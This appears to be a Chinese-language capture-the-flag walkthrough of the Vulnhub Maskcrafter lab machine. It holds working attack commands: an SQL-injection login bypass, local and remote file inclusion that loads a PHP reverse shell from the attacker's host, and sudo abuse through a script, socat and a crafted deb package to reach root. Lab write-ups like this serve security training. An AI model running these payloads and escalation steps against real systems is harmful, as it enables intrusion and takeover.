Vulnhub之Maskcrafter靶机详细测试过程
Maskcrafter
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:4c:3f:93 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:1c:48:cc 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 19:59 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000073s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8f1b43230a248c66ad3da2b969334dd7 (RSA)
| 256 8a2c857c2d9622f698f24ab67a88df23 (ECDSA)
|_ 256 aca799159cbf6944d9c2962a8f799b6d (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/debug
| http-title: Maskcrafter(TM) Login Page
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35771/tcp6 mountd
| 100005 1,2,3 35951/udp mountd
| 100005 1,2,3 47498/udp6 mountd
| 100005 1,2,3 50685/tcp mountd
| 100021 1,3,4 45195/tcp6 nlockmgr
| 100021 1,3,4 46199/tcp nlockmgr
| 100021 1,3,4 48207/udp6 nlockmgr
| 100021 1,3,4 53602/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
38041/tcp open mountd 1-3 (RPC #100005)
45351/tcp open mountd 1-3 (RPC #100005)
46199/tcp open nlockmgr 1-4 (RPC #100021)
50685/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:1C:48:CC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 Welcome to maskcrafter(TM) FTP service.
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||28847|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 115 4096 Mar 21 2020 .
drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||63424|)
150 Here comes the directory listing.
drwxr-xr-x 2 112 115 4096 Mar 30 2020 .
drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
-rw-r--r-- 1 0 0 430 Mar 30 2020 NOTES.txt
-rw-r--r-- 1 0 0 229 Mar 23 2020 cred.zip
226 Directory send OK.
ftp> get NOTES.txt
local: NOTES.txt remote: NOTES.txt
229 Entering Extended Passive Mode (|||15955|)
150 Opening BINARY mode data connection for NOTES.txt (430 bytes).
100% |********************************************************************************| 430 273.03 KiB/s 00:00 ETA
226 Transfer complete.
430 bytes received in 00:00 (224.31 KiB/s)
ftp> get cred.zip
local: cred.zip remote: cred.zip
229 Entering Extended Passive Mode (|||30982|)
150 Opening BINARY mode data connection for cred.zip (229 bytes).
100% |********************************************************************************| 229 427.59 KiB/s 00:00 ETA
226 Transfer complete.
229 bytes received in 00:00 (197.90 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat NOTES.txt
Dear Web Administrator,
I've got a few points to make:
1.) Please choose a stronger password for /debug web-directory.
Having a username as 'admin' is already guessable but selecting a dictionary password is a big NO-NO.
2.) Please revisit the SQL code to prevent SQL injections because the way it is now, it is absolutely terrible.
Basically, we are hoping and praying that no hacker ever finds out about this.
Regards,
Root
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ls -alh
total 20K
drwxr-xr-x 2 kali kali 4.0K Apr 9 20:00 .
drwxr-xr-x 83 kali kali 4.0K Apr 9 19:54 ..
-rw-r--r-- 1 kali kali 229 Mar 23 2020 cred.zip
-rw-r--r-- 1 root root 2.7K Apr 9 19:59 nmap_full_scan
-rw-r--r-- 1 kali kali 430 Mar 29 2020 NOTES.txt
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip
Archive: cred.zip
[cred.zip] cred.txt password:
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ zip2john cred.zip > hashes
ver 1.0 efh 5455 efh 7875 cred.zip/cred.txt PKZIP Encr: 2b chk, TS_chk, cmplen=47, decmplen=35, crc=5D29BC84 ts=63CD cs=63cd type=0
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-09 20:00) 0g/s 9562Kp/s 95
john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ showmount -e 192.168.56.254
Export list for 192.168.56.254:
目标主机没有NFS共享目录。
Kali Linux访问80端口,为用户登录界面,用admin' or 1=1 -- 即可轻松绕过。
登录成功后,在页面源代码中有注释:
<i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br><pre>DB connection ok.</pre><hr>Development in progress, please report any bugs to admin@covid19.localhost<pre>Due to the increase demand for our product, you are to ramp up your productivity by 200%, else suffer a pay cut!</pre>
<html>
<head><title>Employee page</title></head>
<body>
<h3>Welcome admin' or 1=1 -- !</h3>
<!-- <p><a href="?page=warning.php">Director's message</a></p> -->
<a href="logout.php">Logout</a>
</body>
</html>
访问注释中的链接。
访问下面的URL,返回的页面没有变化,但是注释参数page,可能存在本地文件包含漏洞
http://192.168.56.254/index.php?page=warning.php
http://192.168.56.254/index.php?page=../../../../../etc/passwd
访问上述URL得到:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
userx:x:1000:1000:userx:/home/userx:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
researcherx:x:1001:1001:,,,:/home/researcherx:/bin/bash
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
statd:x:113:65534::/var/lib/nfs:/usr/sbin/nologin
evdaez:x:1002:1002:,,,:/home/evdaez:/bin/bash
接着测试一下是否存在远程文件包含漏洞:
在Kali Linux启动http
http://192.168.56.254/index.php?page=http://192.168.56.206:8000/test.txt
得到返回:
jason,great
说明目标主机存在远程文件包含漏洞。
接下来在Kali Linux准备好php reverse文件,然后访问该文件从而得到shell
http://192.168.56.254/index.php?page=http://192.168.56.206:8000/shell.php
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39276
Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
08:15:22 up 17 min, 0 users, load average: 0.00, 0.00, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@maskcrafter:/$
提权
www-data@maskcrafter:/var/www/html$ cat db.php
cat db.php
<?php
$connection = mysqli_connect("localhost", "web", "P@ssw0rdweb", "mydatabase");
if (!$connection)
{
die("<h4>Connection failed -> " . mysqli_connect_error() . "</h4>");
}
echo "<i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br>";
echo "<pre>";
echo "DB connection ok.";
echo "</pre>";
echo "<hr>";
得到了数据库连接的用户名和密码
www-data@maskcrafter:/home$ mysql -uweb -p
mysql -uweb -p
Enter password: P@ssw0rdweb
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 59
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mydatabase |
| mysql |
| performance_schema |
| phpmyadmin |
| sys |
+--------------------+
6 rows in set (0.01 sec)
mysql> use mydatabase;
use mydatabase;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_mydatabase |
+----------------------+
| creds |
| login |
+----------------------+
2 rows in set (0.00 sec)
mysql> select * from creds;
select * from creds;
+----+--------------+-------------+
| id | data_type | password |
+----+--------------+-------------+
| 1 | zip password | cred12345!! |
+----+--------------+-------------+
1 row in set (0.00 sec)
mysql>
这应该是creds.zip的密码
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip
Archive: cred.zip
[cred.zip] cred.txt password:
extracting: cred.txt
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat cred.txt
userx:thisismypasswordforuserx2020
得到了userx的密码,切换shell到该用户。
userx@maskcrafter:~$ sudo -l
sudo -l
Matching Defaults entries for userx on maskcrafter:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User userx may run the following commands on maskcrafter:
(evdaez) NOPASSWD: /scripts/whatsmyid.sh
userx@maskcrafter:~$ ls -alh /scripts/whatsmyid.sh
ls -alh /scripts/whatsmyid.sh
-rwxr-xr-x 1 userx userx 15 Mar 30 2020 /scripts/whatsmyid.sh
userx@maskcrafter:~$ cat /scripts/whatsmyid.sh
cat /scripts/whatsmyid.sh
#!/bin/bash
id
userx@maskcrafter:~$ echo '/bin/bash' >> /scripts/whatsmyid.sh
echo '/bin/bash' >> /scripts/whatsmyid.sh
userx@maskcrafter:~$ sudo -u evdaez /scripts/whatsmyid.sh
sudo -u evdaez /scripts/whatsmyid.sh
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)
bash: /home/userx/.bashrc: Permission denied
evdaez@maskcrafter:~$ id
id
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)
成功切换到了用户evdaez
evdaez@maskcrafter:/home/evdaez$ sudo -l
sudo -l
Matching Defaults entries for evdaez on maskcrafter:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User evdaez may run the following commands on maskcrafter:
(researcherx) NOPASSWD: /usr/bin/socat
evdaez@maskcrafter:/home/evdaez$ sudo -u researcherx /usr/bin/socat stdin exec:/bin/sh
<do -u researcherx /usr/bin/socat stdin exec:/bin/sh
id
id
uid=1001(researcherx) gid=1001(researcherx) groups=1001(researcherx),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
利用socat成功切换到了用户researcherx
cd /tmp
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
Doing `require 'backports'` is deprecated and will not load any backport in the next major release.
Require just the needed backports instead, or 'backports/latest'.
{:timestamp=>"2023-04-10T08:42:18.755150+0000", :message=>"Debian packaging tools generally labels all files in /etc as config files, as mandated by policy, so fpm defaults to this behavior for deb packages. You can disable this default behavior with --deb-no-default-config-files flag", :level=>:warn}
{:timestamp=>"2023-04-10T08:42:18.786663+0000", :message=>"Created package", :path=>"x_1.0_all.deb"}
sudo /usr/bin/dpkg -i x_1.0_all.deb
(Reading database ... 96141 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 88K
drwx------ 9 root root 4.0K Mar 30 2020 .
drwxr-xr-x 28 root root 4.0K Mar 30 2020 ..
-rw-r--r-- 1 root root 39 Mar 20 2020 .bash_aliases
lrwxrwxrwx 1 root root 9 Mar 20 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Mar 20 2020 .bashrc
drwx------ 2 root root 4.0K Mar 21 2020 .cache
-rw-r--r-- 1 root root 22 Mar 20 2020 .gdbinit
drwxr-xr-x 3 root root 4.0K Mar 20 2020 .gem
drwx------ 3 root root 4.0K Mar 21 2020 .gnupg
-rw------- 1 root root 38 Mar 20 2020 .lesshst
drwxr-xr-x 3 root root 4.0K Mar 20 2020 .local
drwxr-xr-x 4 root root 4.0K Mar 20 2020 peda
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 75 Mar 23 2020 root.txt
-rw-r--r-- 1 root root 75 Mar 20 2020 .selected_editor
drwx------ 2 root root 4.0K Mar 20 2020 .ssh
drwxr-xr-x 2 root root 4.0K Mar 21 2020 .vim
-rw------- 1 root root 20K Mar 30 2020 .viminfo
-rw-r--r-- 1 root root 215 Mar 21 2020 .wget-hsts
cat root.txt
Congrats on finishing this VM...
Please tweet me your walkthrough @evdaez
至此得到root shell以及root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
